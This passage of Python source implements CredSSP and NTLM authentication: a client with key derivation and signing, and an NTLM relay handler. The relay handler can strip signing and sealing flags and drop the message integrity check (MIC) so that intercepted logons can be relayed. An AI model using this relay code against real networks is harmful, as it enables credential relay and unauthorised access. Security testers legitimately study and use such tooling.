						res = TSCredentials({'credType': 1, 'credentials': res.dump()})
						sealedMessage, signature = await self.auth_ctx.encrypt(res.dump(), self.seqno) #seq number must be incremented here..
						self.seqno += 1
						retoken = {
							'version' : self.version,
							'authInfo' : signature+sealedMessage
						}
						result = TSRequest(retoken)
						logger.debug('CredSSP - sending credentials: %s' % result.native)
						return self.__return(result.dump(), False, None)
					else:
						# TODO: implement remote credguard
						print('DO NOT USE THIS! THIS IS NOT IMPLEMENTED YET!')
						credBuffer = b''
						data = {
							'packageName' : 'KERBEROS'.encode('utf-16-le'), #dont forget the encoding!
							'credBuffer' : credBuffer
						}

						remcredguardcreds = TSRemoteGuardCreds({
							'logonCred' : TSRemoteGuardPackageCred(data),
							#'supplementalCreds' : [TSRemoteGuardPackageCred(xxxx)]
						})

						#print(remcredguardcreds)
						sealedMessage, signature = await self.auth_ctx.encrypt(remcredguardcreds.dump(), self.seqno) #seq number must be incremented here..
						self.seqno += 1
						retoken = {
							'version' : self.version,
							'authInfo' : signature+sealedMessage
						}
						return self.__return(TSRequest(retoken).dump(), False, None)
		except Exception as e:
			return None, None, e


import copy
import os
import struct
from typing import cast
from asyauth.common.winapi.constants import ISC_REQ

from unicrypto import hmac
from unicrypto import hashlib
from unicrypto.symmetric import RC4

from asyauth.protocols.ntlm import logger
from asyauth.common.credentials.ntlm import NTLMCredential
from asyauth.protocols.ntlm.structures.serverinfo import NTLMServerInfo
from asyauth.protocols.ntlm.structures.negotiate_flags import NegotiateFlags
from asyauth.protocols.ntlm.structures.ntlmssp_message_signature import NTLMSSP_MESSAGE_SIGNATURE
from asyauth.protocols.ntlm.structures.ntlmssp_message_signature_noext import NTLMSSP_MESSAGE_SIGNATURE_NOEXT
from asyauth.protocols.ntlm.messages.negotiate import NTLMNegotiate
from asyauth.protocols.ntlm.messages.challenge import NTLMChallenge
from asyauth.protocols.ntlm.messages.authenticate import NTLMAuthenticate
from asyauth.protocols.ntlm.creds_calc import netntlmv2, AVPAIRType, LMResponse, netntlm, netntlm_ess
from minikerberos.gssapi.channelbindings import ChannelBindingsStruct
		

class NTLMClientNative:
	def __init__(self, credential:NTLMCredential):
		self.credential = credential
		self.challenge = credential.challenge if credential.challenge is not None else os.urandom(8)
		
		self.ntlmNegotiate     = None #ntlm Negotiate message from client
		self.ntlmChallenge     = None #ntlm Challenge message to client
		self.ntlmAuthenticate  = None #ntlm Authenticate message from client
		
		self.ntlmNegotiate_raw     = None #message as bytes, as it's recieved/sent
		self.ntlmChallenge_raw     = None #message as bytes, as it's recieved/sent
		self.ntlmAuthenticate_raw  = None #message as bytes, as it's recieved/sent

		
		self.EncryptedRandomSessionKey = None
		self.RandomSessionKey = credential.session_key if credential.session_key is not None else os.urandom(16)
		self.SessionBaseKey = None
		self.KeyExchangeKey = None
		
		self.SignKey_client = None
		self.SealKey_client = None
		self.SignKey_server = None
		self.SealKey_server = None

		self.crypthandle_client = None
		self.crypthandle_server = None
		
		self.seq_number = 0
		self.iteration_cnt = 0
		self.ntlm_credentials = None
		self.timestamp = credential.timestamp #used in unittest only!
		self.extra_info = None
			
	def load_negotiate(self, data):
		logger.debug('Loading negotiate message')
		self.ntlmNegotiate = NTLMNegotiate.from_bytes(data)
	
	def load_challenge(self, data):
		logger.debug('Loading challenge message')
		self.ntlmChallenge = NTLMChallenge.from_bytes(data)
		
	def load_authenticate(self, data):
		logger.debug('Loading authenticate message')
		self.ntlmAuthenticate = NTLMAuthenticate.from_bytes(data)
		
	def load_sessionkey(self, data):
		logger.debug('Loading sessionkey')
		self.RandomSessionKey = data
		self.setup_crypto(True)
	
	def is_guest(self):
		return self.credential.is_guest

	def get_seq_number(self):
		return self.seq_number
	
	def set_sign(self, tf = True):
		if tf == True:
			self.credential.flags |= NegotiateFlags.NEGOTIATE_SIGN
		else:
			self.credential.flags &= ~NegotiateFlags.NEGOTIATE_SIGN
			
	def set_seal(self, tf = True):
		if tf == True:
			self.credential.flags |= NegotiateFlags.NEGOTIATE_SEAL
		else:
			self.credential.flags &= ~NegotiateFlags.NEGOTIATE_SEAL
			
	def set_version(self, tf = True):
		if tf == True:
			self.credential.flags |= NegotiateFlags.NEGOTIATE_VERSION
		else:
			self.credential.flags &= ~NegotiateFlags.NEGOTIATE_VERSION
			
	def is_extended_security(self):
		return NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY in self.ntlmChallenge.NegotiateFlags
	
	def get_extra_info(self):
		self.extra_info = NTLMServerInfo.from_challenge(self.ntlmChallenge)
		return self.extra_info
		
	def MAC(self, handle, signingKey, seqNum, message):
		if self.is_extended_security() == True:
			msg = NTLMSSP_MESSAGE_SIGNATURE()
			if NegotiateFlags.NEGOTIATE_KEY_EXCH in self.ntlmChallenge.NegotiateFlags:
				tt = struct.pack('<i', seqNum) + message
				t = hmac.new(signingKey, digestmod='md5')
				t.update(tt)
				
				msg.Checksum = handle(t.digest()[:8])
				msg.SeqNum = seqNum
				seqNum += 1
			else:
				t = hmac.new(signingKey, digestmod='md5')
				t.update(struct.pack('<i',seqNum)+message)
				msg.Checksum = t.digest()[:8]
				msg.SeqNum = seqNum
				seqNum += 1
				
		else:
			raise Exception('Not implemented!')
			#t = struct.pack('<I',binascii.crc32(message)& 0xFFFFFFFF)
			#randompad = 0
			#msg = NTLMSSP_MESSAGE_SIGNATURE_NOEXT()
			#msg.RandomPad = handle(struct.pack('<I',randompad))
			#msg.Checksum = struct.unpack('<I',handle(messageSignature['Checksum']))[0]
			
		return msg.to_bytes()

	async def encrypt(self, data, sequence_no):
		"""
		This function is to support SSPI encryption.
		"""
		data = self.SEAL(
			self.SignKey_client,
			self.SealKey_client, 
			data,
			data,
			sequence_no, 
			self.crypthandle_client.encrypt
		)
		return data

	async def decrypt(self, data, sequence_no, direction='init', auth_data=None):
		"""
		This function is to support SSPI decryption.
		"""
		edata = data[16:]
		srv_sig = NTLMSSP_MESSAGE_SIGNATURE.from_bytes(data[:16])
		sealedMessage = self.crypthandle_server.encrypt(edata)
		signature = self.MAC(self.crypthandle_server.encrypt, self.SignKey_server, srv_sig.SeqNum, sealedMessage)
		#print('seqno     %s' % sequence_no)
		#print('Srv  sig: %s' % data[:16])
		#print('Calc sig: %s' % signature)

		return sealedMessage, None

	async def sign(self, data, message_no, direction=None, reset_cipher = False):
		"""
		Singing outgoing messages. The reset_cipher parameter is needed for calculating mechListMIC. 
		"""
		#print('sign data : %s' % data)
		#print('sign message_no : %s' % message_no)
		#print('sign direction : %s' % direction)
		signature = self.MAC(self.crypthandle_client.encrypt, self.SignKey_client, message_no, data)
		if reset_cipher is True:
			self.crypthandle_client = RC4(self.SealKey_client)
			self.crypthandle_server = RC4(self.SealKey_server)
		self.seq_number += 1
		return signature

	async def verify(self, data, signature):
		"""
		Verifying incoming server message
		"""
		signature_struct = NTLMSSP_MESSAGE_SIGNATURE.from_bytes(signature)
		calc_sig = self.MAC(self.crypthandle_server.encrypt, self.SignKey_server, signature_struct.SeqNum, data)
		#print('server signature    : %s' % signature)
		#print('calculates signature: %s' % calc_sig)
		return signature == calc_sig

	def SEAL(self, signingKey, sealingKey, messageToSign, messageToEncrypt, seqNum, cipher_encrypt):
		"""
		This is the official SEAL function.
		"""
		sealedMessage = cipher_encrypt(messageToEncrypt)
		signature = self.MAC(cipher_encrypt, signingKey, seqNum, messageToSign)
		return sealedMessage, signature
		
	def SIGN(self, signingKey, message, seqNum, cipher_encrypt):
		"""
		This is the official SIGN function.
		"""
		return self.MAC(cipher_encrypt, signingKey, seqNum, message)
	
	def signing_needed(self):
		return (
			NegotiateFlags.NEGOTIATE_SIGN in self.ntlmChallenge.NegotiateFlags or \
			NegotiateFlags.NEGOTIATE_SEAL in self.ntlmChallenge.NegotiateFlags
		)
	
	def encryption_needed(self):
		return NegotiateFlags.NEGOTIATE_SEAL in self.ntlmChallenge.NegotiateFlags

	def calc_sealkey(self, mode = 'Client'):
		if NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY in self.ntlmChallenge.NegotiateFlags:
			if NegotiateFlags.NEGOTIATE_128 in self.ntlmChallenge.NegotiateFlags:
				sealkey = self.RandomSessionKey
			elif NegotiateFlags.NEGOTIATE_56 in self.ntlmChallenge.NegotiateFlags:
				sealkey = self.RandomSessionKey[:7]
			else:
				sealkey = self.RandomSessionKey[:5]
				
			if mode == 'Client':
				md5 = hashlib.new('md5')
				md5.update(sealkey + b'session key to client-to-server sealing key magic constant\x00')
				sealkey = md5.digest()
			else:
				md5 = hashlib.new('md5')
				md5.update(sealkey + b'session key to server-to-client sealing key magic constant\x00')
				sealkey = md5.digest()
				
		elif NegotiateFlags.NEGOTIATE_56 in self.ntlmChallenge.NegotiateFlags:
			sealkey = self.RandomSessionKey[:7] + b'\xa0'
		else:
			sealkey = self.RandomSessionKey[:5] + b'\xe5\x38\xb0'
			
		if mode == 'Client':
			self.SealKey_client = sealkey
			if sealkey is not None:
				self.crypthandle_client = RC4(self.SealKey_client)
		else:
			self.SealKey_server = sealkey
			if sealkey is not None:
				self.crypthandle_server = RC4(self.SealKey_server)
		
		if sealkey is not None:
			logger.debug('Setting %s sealkey to %s' % (mode, sealkey.hex()))
		return sealkey
		
	def calc_signkey(self, mode = 'Client'):
		if NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY in self.ntlmChallenge.NegotiateFlags:
			if mode == 'Client':
				md5 = hashlib.new('md5')
				md5.update(self.RandomSessionKey + b"session key to client-to-server signing key magic constant\x00")
				signkey = md5.digest()
			else:
				md5 = hashlib.new('md5')
				md5.update(self.RandomSessionKey + b"session key to server-to-client signing key magic constant\x00")
				signkey = md5.digest()
		else:
			signkey = None
			
		if mode == 'Client':
			if signkey is not None:
				logger.debug('Setting client signkey to %s' % signkey.hex())
			self.SignKey_client = signkey

		else:
			if signkey is not None:
				logger.debug('Setting server signkey to %s' % signkey.hex())
			self.SignKey_server = signkey
		
		return signkey
		
	def get_session_key(self):
		return self.RandomSessionKey
		
	def get_sealkey(self, mode = 'Client'):
		if mode == 'Client':
			return self.SealKey_client
		else:
			return self.SealKey_server
			
	def get_signkey(self, mode = 'Client'):
		if mode == 'Client':
			return self.SignKey_client
		else:
			return self.SignKey_server
		
	def setup_crypto(self, is_remote = False):
		logger.debug('Setting up crypto')
		if not self.RandomSessionKey:
			self.RandomSessionKey = os.urandom(16)
			logger.debug('RandomSessionKey: %s' % self.RandomSessionKey.hex())
		
		
		if self.credential.is_guest == True:
			self.SessionBaseKey = b'\x00' * 16
			self.KeyExchangeKey = b'\x00' * 16
				
			rc4 = RC4(self.KeyExchangeKey)
			self.EncryptedRandomSessionKey = rc4.encrypt(self.RandomSessionKey)
			logger.debug('EncryptedRandomSessionKey: %s' % self.EncryptedRandomSessionKey.hex())

		else:
			if is_remote is False:
				#this check is here to provide the option to load the messages + the sessionbasekey manually
				#then you will be able to use the sign and seal functions provided by this class
				self.SessionBaseKey = self.ntlm_credentials.SessionBaseKey
			
				rc4 = RC4(self.KeyExchangeKey)
				self.EncryptedRandomSessionKey = rc4.encrypt(self.RandomSessionKey)
				logger.debug('EncryptedRandomSessionKey: %s' % self.EncryptedRandomSessionKey.hex())
		
		self.calc_sealkey('Client')
		self.calc_sealkey('Server')
		self.calc_signkey('Client')
		self.calc_signkey('Server')

	def isc_to_ntlm_flags(self, flags):
		# trying to guess what ISC flags match which
		if isinstance(flags, NegotiateFlags) is True:
			return flags
		if flags is None:
			# using the pre-defined flags
			return self.credential.flags
		ntlmflags = copy.deepcopy(self.credential.flags)
		ntlmflags |= NegotiateFlags.NEGOTIATE_56
		ntlmflags |= NegotiateFlags.NEGOTIATE_KEY_EXCH
		ntlmflags |= NegotiateFlags.NEGOTIATE_128
		ntlmflags |= NegotiateFlags.NEGOTIATE_VERSION
		ntlmflags |= NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY
		ntlmflags |= NegotiateFlags.NEGOTIATE_NTLM
		ntlmflags |= NegotiateFlags.NEGOTIATE_LM_KEY
		ntlmflags |= NegotiateFlags.REQUEST_TARGET
		ntlmflags |= NegotiateFlags.NTLM_NEGOTIATE_OEM
		ntlmflags |= NegotiateFlags.NEGOTIATE_UNICODE
		
		if ISC_REQ.INTEGRITY in flags:
			ntlmflags |= NegotiateFlags.NEGOTIATE_SIGN
		else:
			ntlmflags  &= ~NegotiateFlags.NEGOTIATE_SIGN

		
		if ISC_REQ.CONFIDENTIALITY in flags:
			ntlmflags |= NegotiateFlags.NEGOTIATE_SEAL
		else:
			ntlmflags  &= ~NegotiateFlags.NEGOTIATE_SEAL
		
		return ntlmflags

	async def authenticate(self, authData, flags = None, cb_data = None, spn=None, **kwargs):
		# check if kwargs have target info
		target = None
		try:
			if 'target' in kwargs:
				from asysocks.unicomm.common.target import UniTarget
				target = cast(UniTarget, kwargs['target'])
		except:
			pass
			
		flags = self.isc_to_ntlm_flags(flags)
		logger.debug('Flags: %s' % flags)
		if self.iteration_cnt == 0:
			if authData is not None:
				raise Exception('First call as client MUST be with empty data!')
				
			self.iteration_cnt += 1
			#negotiate message was already calulcated in setup
			self.ntlmNegotiate = NTLMNegotiate.construct(flags, domainname = self.credential.negotiate_domain, workstationname = self.credential.negotiate_workstation, version = self.credential.negotiate_version)			
			self.ntlmNegotiate_raw = self.ntlmNegotiate.to_bytes()
			logger.debug('Negotiate: %s' % self.ntlmNegotiate)
			return self.ntlmNegotiate_raw, True, None
			
		else:
			#server challenge incoming
			self.ntlmChallenge_raw = authData
			self.ntlmChallenge = NTLMChallenge.from_bytes(authData)
				
			##################flags = self.ntlmChallenge.NegotiateFlags
				
			#we need to calculate the response based on the credential and the settings flags
			if self.credential.ntlm_version == 1:
				logger.debug('NTLMv1 is used here')
				#NTLMv1 authentication
				# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/464551a8-9fc4-428e-b3d3-bc5bfb2e73a5
					
				#check if we authenticate as guest
				if self.credential.is_guest == True:
					logger.debug('NTLMv1 Guest authentication')
					lmresp = LMResponse()
					self.set_version(False)
					lmresp.Response = b'\x00'
					self.ntlmAuthenticate = NTLMAuthenticate.construct(
						flags,
						lm_response= lmresp,
						mic=None,
						encrypted_session = self.EncryptedRandomSessionKey,
						workstationname=target.hostname if target is not None else None
					)
					logger.debug('NTLMv1 Guest - NTLMAuthenticate: %s' % self.ntlmAuthenticate)
					return self.ntlmAuthenticate.to_bytes(), False, None
						
				if flags & NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY:
					logger.debug('NTLMv1 with extended security')
					self.ntlm_credentials = netntlm_ess.construct(self.ntlmChallenge.ServerChallenge, self.challenge, self.credential)
					
					self.KeyExchangeKey = self.ntlm_credentials.calc_key_exchange_key()
					self.setup_crypto()
						
					self.ntlmAuthenticate = NTLMAuthenticate.construct(
						flags,
						lm_response= self.ntlm_credentials.LMResponse,
						nt_response = self.ntlm_credentials.NTResponse,
						version = self.ntlmNegotiate.Version,
						encrypted_session = self.EncryptedRandomSessionKey,
						workstationname=target.hostname if target is not None else None
					)
					logger.debug('NTLMv1 with extended security - NTLMAuthenticate: %s' % self.ntlmAuthenticate)
				else:
					self.ntlm_credentials = netntlm.construct(self.ntlmChallenge.ServerChallenge, self.credential)
						
					self.KeyExchangeKey = self.ntlm_credentials.calc_key_exchange_key(with_lm = flags & NegotiateFlags.NEGOTIATE_LM_KEY, non_nt_session_key = flags & NegotiateFlags.REQUEST_NON_NT_SESSION_KEY)						
					self.setup_crypto()
					self.ntlmAuthenticate = NTLMAuthenticate.construct(
						flags,
						lm_response= self.ntlm_credentials.LMResponse,
						nt_response = self.ntlm_credentials.NTResponse,
						version = self.ntlmNegotiate.Version,
						encrypted_session = self.EncryptedRandomSessionKey,
						workstationname=target.hostname if target is not None else None
					)
					logger.debug('NTLMv1 - NTLMAuthenticate: %s' % self.ntlmAuthenticate)
							
							
			else:
				#NTLMv2
				# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/5e550938-91d4-459f-b67d-75d70009e3f3
				if self.credential.is_guest == True:
					lmresp = LMResponse()
					lmresp.Response = b'\x00'
					self.set_version(False)
					self.setup_crypto()
					self.ntlmAuthenticate = NTLMAuthenticate.construct(
						flags,
						lm_response= lmresp,
						encrypted_session = self.EncryptedRandomSessionKey,
						workstationname=target.hostname if target is not None else None
					)						
					logger.debug('NTLMv2 Guest - NTLMAuthenticate: %s' % self.ntlmAuthenticate)
					return self.ntlmAuthenticate.to_bytes(), False, None
						
				else:
					#comment this out for testing!
					ti = self.ntlmChallenge.TargetInfo
					if spn is not None:
						ti[AVPAIRType.MsvAvTargetName] = spn
					if cb_data is not None:
						cb_struct = ChannelBindingsStruct()
						cb_struct.application_data = cb_data

						md5_ctx = hashlib.new('md5')
						md5_ctx.update(cb_struct.to_bytes())
						ti[AVPAIRType.MsvChannelBindings] = md5_ctx.digest()
					###
						
					self.ntlm_credentials = netntlmv2.construct(self.ntlmChallenge.ServerChallenge, self.challenge, ti, self.credential, timestamp = self.timestamp)
					self.KeyExchangeKey = self.ntlm_credentials.calc_key_exchange_key()
					logger.debug('NTLMv2 - KeyExchangeKey: %s' % self.KeyExchangeKey.hex())				
					self.setup_crypto()
						
					#TODO: if "ti" / targetinfo in the challenge message has "MsvAvFlags" type and the bit for MIC is set (0x00000002) we need to send a MIC. probably...
					mic = None
						
					self.ntlmAuthenticate = NTLMAuthenticate.construct(
						flags,
						domainname= self.credential.domain,
						workstationname=target.hostname if target is not None else None,
						username= self.credential.username,
						lm_response= self.ntlm_credentials.LMResponse,
						nt_response= self.ntlm_credentials.NTResponse,
						version = self.ntlmNegotiate.Version,
						encrypted_session = self.EncryptedRandomSessionKey,
						mic = mic,
					)
				
					logger.debug('NTLMv2 - NTLMAuthenticate: %s' % self.ntlmAuthenticate)
			self.ntlmAuthenticate_raw = self.ntlmAuthenticate.to_bytes()
			return self.ntlmAuthenticate_raw, False, None



import traceback
import asyncio
import logging
import copy
import os

from asyauth import logger
from asyauth.common.credentials.ntlm import NTLMCredential
from asyauth.protocols.ntlm.structures.serverinfo import NTLMServerInfo
from asyauth.protocols.ntlm.structures.negotiate_flags import NegotiateFlags
from asyauth.protocols.ntlm.messages.negotiate import NTLMNegotiate
from asyauth.protocols.ntlm.messages.challenge import NTLMChallenge
from asyauth.protocols.ntlm.messages.authenticate import NTLMAuthenticate
from asyauth.protocols.ntlm.creds_calc import NTLMCredentials
from asyauth.protocols.ntlm.structures.avpair import MsvAvFlags, AVPAIRType, AVPair
from asyauth.protocols.ntlm.structures.challenge_response import NTLMv2Response
from minikerberos.gssapi.channelbindings import ChannelBindingsStruct
from typing import Callable

async def log_cb_dummy(msg):
	print(msg)

class NTLMRelaySettings:
	def __init__(self, log_callback = log_cb_dummy):
		self.log_id = os.urandom(4).hex()
		self.log_callback = log_callback # async function that will be called with the log message
		self.force_signdisable = False
		self.dropmic = False
		self.dropmic2 = False
		self.modify_negotiate_cb = None
		self.modify_challenge_cb = None
		self.modify_authenticate_cb = None
		self.timeout = 20

class NTLMRelayHandler:
	def __init__(self, settings = None):
		self.spnego_obj = None # this is a dirty trick that requires the gssapi object to be set from the outside. This was needed because the server side might not be using SPNEGO
		if settings is None:
			settings = NTLMRelaySettings()
		self.log_id = os.urandom(4).hex()
		self.settings = settings
		self.log_callback = self.settings.log_callback
		self.force_signdisable = self.settings.force_signdisable
		self.dropmic = self.settings.dropmic
		self.dropmic2 = self.settings.dropmic2
		self.modify_negotiate_cb = self.settings.modify_negotiate_cb
		self.modify_challenge_cb = self.settings.modify_challenge_cb
		self.modify_authenticate_cb = self.settings.modify_authenticate_cb

		self.flags = None
		self.challenge = None
		
		self.ntlmNegotiate:NTLMNegotiate     = None #ntlm Negotiate message from client
		self.ntlmChallenge:NTLMChallenge     = None #ntlm Challenge message to client
		self.ntlmAuthenticate:NTLMAuthenticate  = None #ntlm Authenticate message from client
		
		self.ntlmNegotiate_raw:bytes     = None #message as bytes, as it's recieved/sent
		self.ntlmChallenge_raw:bytes     = None #message as bytes, as it's recieved/sent
		self.ntlmAuthenticate_raw:bytes  = None #message as bytes, as it's recieved/sent

		self.ntlmNegotiate_server:NTLMNegotiate    = None
		self.ntlmChallenge_server:NTLMChallenge    = None
		self.ntlmAuthenticate_server:NTLMAuthenticate = None
		
		self.ntlmNegotiate_server_raw:bytes  = None
		self.ntlmChallenge_server_raw:bytes  = None
		self.ntlmAuthenticate_server_raw:bytes = None

		
		self.EncryptedRandomSessionKey = None
		self.RandomSessionKey = None
		self.SessionBaseKey = None
		self.KeyExchangeKey = None
		
		self.SignKey_client = None
		self.SealKey_client = None
		self.SignKey_server = None
		self.SealKey_server = None
		
		self.iteration_cnt = 0
		self.ntlm_credentials = None
		self.extra_info = None
		self.negotiate_evt = asyncio.Event()
		self.challenge_evt = asyncio.Event()
		self.authenticate_evt = asyncio.Event()
		self.start_client_evt = asyncio.Event()

	def is_guest(self):
		return False
	
	def set_sign(self, tf = True):
		if tf == True:
			self.flags |= NegotiateFlags.NEGOTIATE_SIGN
		else:
			self.flags &= ~NegotiateFlags.NEGOTIATE_SIGN
			
	def set_seal(self, tf = True):
		if tf == True:
			self.flags |= NegotiateFlags.NEGOTIATE_SEAL
		else:
			self.flags &= ~NegotiateFlags.NEGOTIATE_SEAL
			
	def set_version(self, tf = True):
		if tf == True:
			self.flags |= NegotiateFlags.NEGOTIATE_VERSION
		else:
			self.flags &= ~NegotiateFlags.NEGOTIATE_VERSION
	
	def set_kex(self, tf = True):
		if tf == True:
			self.flags |= NegotiateFlags.NEGOTIATE_KEY_EXCH
		else:
			self.flags &= ~NegotiateFlags.NEGOTIATE_KEY_EXCH			
	
	def is_extended_security(self):
		return NegotiateFlags.NEGOTIATE_EXTENDED_SESSIONSECURITY in self.ntlmChallenge.NegotiateFlags
	
	def signing_needed(self):
		return False
		return (
			NegotiateFlags.NEGOTIATE_SIGN in self.ntlmChallenge.NegotiateFlags or \
			NegotiateFlags.NEGOTIATE_SEAL in self.ntlmChallenge.NegotiateFlags
		)
	
	def encryption_needed(self):
		return False
		return NegotiateFlags.NEGOTIATE_SEAL in self.ntlmChallenge.NegotiateFlags

	def get_extra_info(self):
		if self.ntlmChallenge is None:
			return None
		self.extra_info = NTLMServerInfo.from_challenge(self.ntlmChallenge)
		creds = NTLMCredentials.construct(self.ntlmNegotiate, self.ntlmChallenge, self.ntlmAuthenticate)
		self.extra_info.creds = creds[0]
		return self.extra_info
		
	def MAC(self, handle, signingKey, seqNum, message):
		"""
		Not possible to perform this function due to unknown keys during relaying
		"""
		raise NotImplementedError()

	def SEAL(self, signingKey, sealingKey, messageToSign, messageToEncrypt, seqNum, cipher_encrypt):
		"""
		Not possible to perform this function due to unknown keys during relaying
		"""
		raise NotImplementedError()
		
	def SIGN(self, signingKey, message, seqNum, cipher_encrypt):
		"""
		Not possible to perform this function due to unknown keys during relaying
		"""
		raise NotImplementedError()
		
	def calc_sealkey(self, mode = 'Client'):
		"""
		Not possible to perform this function due to unknown keys during relaying
		"""
		raise NotImplementedError()
		
	def calc_signkey(self, mode = 'Client'):
		"""
		Not possible to perform this function due to unknown keys during relaying
		"""
		raise NotImplementedError()
		
	def get_session_key(self):
		return b'\x00'*16
		
	def get_sealkey(self, mode = 'Client'):
		return b'\x00'*16
			
	def get_signkey(self, mode = 'Client'):
		return b'\x00'*16
	
	async def log_async(self, level, msg):
		if self.log_callback is not None:
			src = 'NTLM-%s' % self.log_id
			await self.log_callback('[%s][%s] %s' % (src, level, msg))
		else:
			logger.log(level, msg)
	
	def terminate(self):
		# called when either the server or the client abruptly terminates
		# or some other connection-related issues arise
		if self.negotiate_evt is not None:
			self.negotiate_evt.set()
		if self.challenge_evt is not None:
			self.challenge_evt.set()
		if self.authenticate_evt is not None:
			self.authenticate_evt.set()
		if self.start_client_evt is not None:
			self.start_client_evt.set()

	
	async def modify_negotiate(self):
		"""
		By default we don't modify the structures because there can be all kinds of integrity protections.
		However, if you find some cool stuff then you can just populate the modify_negotiate_cb in the settings, 
		but you MUST return both ntlmNegotiate and ntlmNegotiate_raw structures and/or indicate an error 
		which must be of class Exception!
		"""
		try:
			if self.modify_negotiate_cb is not None:
				await self.log_async(logging.DEBUG, '[NEGOTIATE] MODIFY EXTERNAL')
				self.ntlmNegotiate, self.ntlmNegotiate_raw, err = await self.modify_negotiate_cb(self.ntlmNegotiate_server, self.ntlmNegotiate_server_raw)
				return None, err
			
			if self.force_signdisable is True:
				await self.log_async(logging.DEBUG, '[NEGOTIATE] DISABLING SINGING')
				self.ntlmNegotiate = self.ntlmNegotiate_server
				self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_ALWAYS_SIGN
				self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_KEY_EXCH
				self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SEAL
				self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SIGN
				
				#self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_VERSION

			elif self.dropmic is True:
				await self.log_async(logging.DEBUG, '[NEGOTIATE] Drop MIC')
				self.ntlmNegotiate = self.ntlmNegotiate_server
				self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_ALWAYS_SIGN
				self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SIGN
			
			elif self.dropmic2 is True:
				await self.log_async(logging.DEBUG, '[NEGOTIATE] Drop MIC 2')
				self.ntlmNegotiate = self.ntlmNegotiate_server
				self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_ALWAYS_SIGN
				self.ntlmNegotiate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SIGN
			
			else:
				await self.log_async(logging.DEBUG, '[NEGOTIATE] NO MODS')
				self.ntlmNegotiate = self.ntlmNegotiate_server
			
			
			self.ntlmNegotiate_raw = self.ntlmNegotiate.to_bytes()


			return None, None
		except Exception as e:
			traceback.print_exc()
			return False, e
	
	async def modify_challenge(self):
		"""
		By default we don't modify the structures because there can be all kinds of integrity protections.
		However, if you find some cool stuff then you can just populate the modify_authenticate_cb in the settings, 
		but you MUST return both ntlmChallenge_server and ntlmChallenge_server_raw structures and/or indicate an error 
		which must be of class Exception!
		"""
		try:
			if self.modify_challenge_cb is not None:
				await self.log_async(logging.DEBUG, '[CHALLENGE] MODIFY EXTERNAL')
				self.ntlmChallenge_server, self.ntlmChallenge_server_raw, err = await self.modify_challenge_cb(self.ntlmChallenge, self.ntlmChallenge_raw)
				return None, err

			if self.dropmic2 is False:
				await self.log_async(logging.DEBUG, '[CHALLENGE] NO MODS')
				self.ntlmChallenge_server = self.ntlmChallenge
				self.ntlmChallenge_server_raw = self.ntlmChallenge_raw			
			else:
				await self.log_async(logging.DEBUG, '[CHALLENGE] Drop MIC 2')
				self.ntlmChallenge_server = copy.deepcopy(self.ntlmChallenge)

				extra_avpair = AVPair()
				extra_avpair.type = AVPAIRType.MsvAvFlags
				extra_avpair.data = 0

				self.ntlmChallenge_server.TargetInfoFields.length += len(extra_avpair.to_bytes())
				self.ntlmChallenge_server.TargetInfoFields.maxLength += len(extra_avpair.to_bytes())

				payload = self.ntlmChallenge_server.TargetName.encode('utf-16le')
				payload += extra_avpair.to_bytes()
				payload += self.ntlmChallenge_server.TargetInfo.to_bytes()

				buff  = self.ntlmChallenge_server.Signature
				buff += self.ntlmChallenge_server.MessageType.to_bytes(4, byteorder = 'little', signed = False)
				buff += self.ntlmChallenge_server.TargetNameFields.to_bytes()
				buff += self.ntlmChallenge_server.NegotiateFlags.to_bytes(4, byteorder = 'little', signed = False)
				buff += self.ntlmChallenge_server.ServerChallenge
				buff += self.ntlmChallenge_server.Reserved
				buff += self.ntlmChallenge_server.TargetInfoFields.to_bytes()
				if self.ntlmChallenge_server.Version:
					if isinstance(self.ntlmChallenge_server.Version, bytes):
						buff += self.ntlmChallenge_server.Version
					else:
						buff += self.ntlmChallenge_server.Version.to_bytes()
				buff += payload

				self.ntlmChallenge_server_raw = buff

			return None, None
		except Exception as e:
			traceback.print_exc()
			return False, e
	
	async def modify_authenticate(self):
		"""
		By default we don't modify the structures because there can be all kinds of integrity protections.
		However, if you find some cool stuff then you can just populate the modify_authenticate_cb in the settings, 
		but you MUST return both ntlmAuthenticate and ntlmAuthenticate_raw structures and/or indicate an error 
		which must be of class Exception!
		"""
		try:
			if self.modify_authenticate_cb is not None:
				await self.log_async(logging.DEBUG, '[AUTHENTICATE] MODIFY EXTERNAL')
				self.ntlmAuthenticate, self.ntlmAuthenticate_raw, err = await self.modify_authenticate_cb(self.ntlmAuthenticate_server, self.ntlmAuthenticate_server_raw)
				return None, err

			if self.dropmic2 is True:
				await self.log_async(logging.DEBUG, '[AUTHENTICATE] Drop MIC 2')
				self.ntlmAuthenticate = self.ntlmAuthenticate_server
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_ALWAYS_SIGN
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SIGN
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_KEY_EXCH
				self.ntlmAuthenticate.NegotiateFlags &= ~ NegotiateFlags.NEGOTIATE_SEAL
				self.ntlmAuthenticate.MIC = None
				self.ntlmAuthenticate_raw = self.ntlmAuthenticate.to_bytes_full()

			elif self.dropmic is True:
				await self.log_async(logging.DEBUG, '[AUTHENTICATE] Drop MIC')
				self.ntlmAuthenticate = self.ntlmAuthenticate_server
